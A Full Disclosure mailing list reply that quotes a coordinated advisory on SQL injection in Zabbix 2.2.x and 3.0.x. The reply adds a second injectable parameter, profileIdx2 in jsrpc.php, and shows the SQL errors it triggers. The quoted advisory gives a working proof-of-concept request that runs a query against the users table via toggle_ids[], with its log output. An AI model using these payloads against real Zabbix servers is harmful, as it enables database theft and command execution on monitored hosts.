I actually ended up finding this vuln in a different vector (in the profileIdx2
parameter).
/zabbix/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471054088083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2’3297&updateProfile=true&screenitemid=&period=3600&stime=20170813040734&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
<div class="flickerfreescreen" data-timestamp="1471054088083"
id="flickerfreescreen_1"><table class="list-table"
id="t57ae81946b8cb"><thead><tr><th
class="cell-width">Timestamp</th><th>Value</th></tr></thead><tbody><tr
class="nothing-to-show"><td colspan="2">No data
found.</td></tr></tbody></table></div><div class="msg-bad"><div
class="msg-details"><ul><li>Error in query [INSERT INTO profiles (profileid,
userid, idx, value_int, type, idx2) VALUES (39, 1, 'web.item.graph.period',
'3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near
''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles (profileid,
userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime',
'20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to
use near ''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles
(profileid, userid, idx, value_int, type, idx2) VALUES (41, 1,
'web.item.graph.isnow', '1', 2, 2'3297)] [You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
syntax to use near ''3297)' at line 1]</li></ul></div><span
class="overlay-close-btn" onclick="javascript:
$(this).closest('.msg-bad').remove();" title="Close"></span></div>
Similarly, it requires auth unless you enable Guest.
> On Aug 11, 2016, at 7:23 PM, 1n3@xxxxxxxxxxxx wrote:
>
> =========================================
> Title: Zabbix 3.0.3 SQL Injection Vulnerability
> Product: Zabbix
> Vulnerable Version(s): 2.2.x, 3.0.x
> Fixed Version: 3.0.4
> Homepage: http://www.zabbix.com
> Patch link: https://support.zabbix.com/browse/ZBX-11023
> Credit: 1N3@CrowdShield
> ==========================================
>
>
> Vendor Description:
> =====================
> Zabbix is an open source availability and performance monitoring solution.
>
>
> Vulnerability Overview:
> =====================
> Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection
> vulnerability due to a failure to sanitize input in the toggle_ids array in
> the latest.php page.
>
>
> Business Impact:
> =====================
> By exploiting this SQL injection vulnerability, an authenticated attacker (or
> guest user) is able to gain full access to the database. This would allow an
> attacker to escalate their privileges to a power user, compromise the
> database, or execute commands on the underlying database operating system.
>
> Because of the functionalities Zabbix offers, an attacker with admin
> privileges (depending on the configuration) can execute arbitrary OS commands
> on the configured Zabbix hosts and server. This results in a severe impact to
> the monitored infrastructure.
>
> Although the attacker needs to be authenticated in general, the system could
> also be at risk if the adversary has no user account. Zabbix offers a guest
> mode which provides a low privileged default account for users without
> password. If this guest mode is enabled, the SQL injection vulnerability can
> be exploited unauthenticated.
>
>
> Proof of Concept:
> =====================
>
> latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385);
> select * from users where (1=1
>
> Result:
> SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int,
> type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from
> users where (1=1)
> latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() →
> DBexecute() in
> /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
>
>
> Disclosure Timeline:
> =====================
>
> 7/18/2016 - Reported vulnerability to Zabbix
> 7/21/2016 - Zabbix responded with permission to file CVE and to disclose
> after a patch is made public
> 7/22/2016 - Zabbix released patch for vulnerability
> 8/3/2016 - CVE details submitted
> 8/11/2016 - Vulnerability details disclosed
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/